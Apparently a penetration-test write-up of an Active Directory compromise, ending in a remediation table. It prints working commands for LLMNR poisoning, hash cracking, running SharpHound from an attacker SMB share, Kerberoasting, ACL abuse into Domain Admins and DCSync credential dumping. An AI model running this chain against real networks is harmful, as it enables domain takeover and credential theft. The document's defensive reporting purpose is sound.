BloodHound path — Domain User → Service Account → Domain Admin
Engagement Context
- Scope: Internal network, full domain (no carve-outs)
- Starting position: Wired network drop, unauthenticated
- Time to Domain Admin: 4 hours 12 minutes
- Detection: Zero (confirmed post-engagement with blue team)
Phase 1 — Network Reconnaissance
1
2
3
4
5
6
7
| # Identify live hosts
sudo nmap -sn 10.10.0.0/16 -oG hosts-alive.txt
grep "Up" hosts-alive.txt | awk '{print $2}' > live-hosts.txt
# Find domain controllers (port 88 = Kerberos, 389 = LDAP)
sudo nmap -p 88,389,445,3389 --open -iL live-hosts.txt
# Result: 10.10.1.10 (DC01), 10.10.1.11 (DC02)
|
Phase 2 — LLMNR / NBT-NS Poisoning
With no credentials yet, we listened for LLMNR broadcasts using Responder:
1
2
3
4
| sudo responder -I eth0 -rdwv
# Within 8 minutes:
# [SMB] NTLMv2-SSP Hash Captured:
# jsmith::CORP:aad3b435b51404ee:...
|
Crack the NTLMv2 hash offline:
1
2
| hashcat -m 5600 jsmith_hash.txt /usr/share/wordlists/rockyou.txt
# jsmith::CORP:... → Welcome1!
|
Phase 3 — BloodHound Enumeration
With domain credentials we ran SharpHound to collect AD relationship data:
1
2
3
4
| # Transfer SharpHound via SMB
impacket-smbserver share . -smb2support
# On victim:
\\attacker-ip\share\SharpHound.exe -c All --zipfilename bh-data.zip
|
BloodHound revealed a clear path:
1
2
3
4
| jsmith (Domain User)
→ MemberOf → IT-Helpdesk
→ GenericWrite → svc_backup (service account)
→ svc_backup has path to Domain Admin via ACL chain
|
Phase 4 — Kerberoasting
svc_backup had an SPN set — making it Kerberoastable:
1
2
3
4
5
6
7
| impacket-GetUserSPNs CORP/jsmith:'Welcome1!' -dc-ip 10.10.1.10 -request -outputfile spn_hashes.txt
# Contents of spn_hashes.txt:
# $krb5tgs$23$*svc_backup$CORP.LOCAL$MSSQLSvc/sql01.corp.local*$...
hashcat -m 13100 spn_hashes.txt /usr/share/wordlists/rockyou.txt
# svc_backup → Backup2023!
|
Phase 5 — ACL Abuse to Domain Admin
BloodHound showed svc_backup had WriteOwner on the Domain Admins group. We leveraged this with PowerView:
1
2
3
4
5
6
7
8
9
10
11
| # Import PowerView
Import-Module .\PowerView.ps1
# Take ownership of Domain Admins group
Set-DomainObjectOwner -Identity "Domain Admins" -OwnerIdentity svc_backup
# Grant svc_backup full control
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity svc_backup -Rights All
# Add jsmith to Domain Admins
Add-DomainGroupMember -Identity "Domain Admins" -Members jsmith
|
Phase 6 — DCSync (Credential Dumping)
With Domain Admin rights, we ran DCSync to extract all domain hashes:
1
2
3
4
5
| impacket-secretsdump CORP/jsmith:'Welcome1!'@10.10.1.10 -just-dc-ntlm
# Output:
# CORP\Administrator:500:aad3b435:31d6cfe0d16ae931b73c59d7e0c089c0:::
# CORP\krbtgt:502:aad3b435:b38c2a7ff5a53e5ac1d3ab67f3e6b0a1:::
|
With the krbtgt hash, persistence via Golden Ticket is trivial.
Key Findings Summary
| Finding | Risk | Remediation |
|---|
| LLMNR/NBT-NS enabled | High | Disable via GPO |
| Weak user passwords | High | Enforce complexity + MFA |
| Kerberoastable service accounts | High | Use gMSA, long random passwords |
| Dangerous ACLs on DA group | Critical | Audit with BloodHound, remove |
| No EDR / alerting | Critical | Deploy MDR/EDR on all endpoints |
References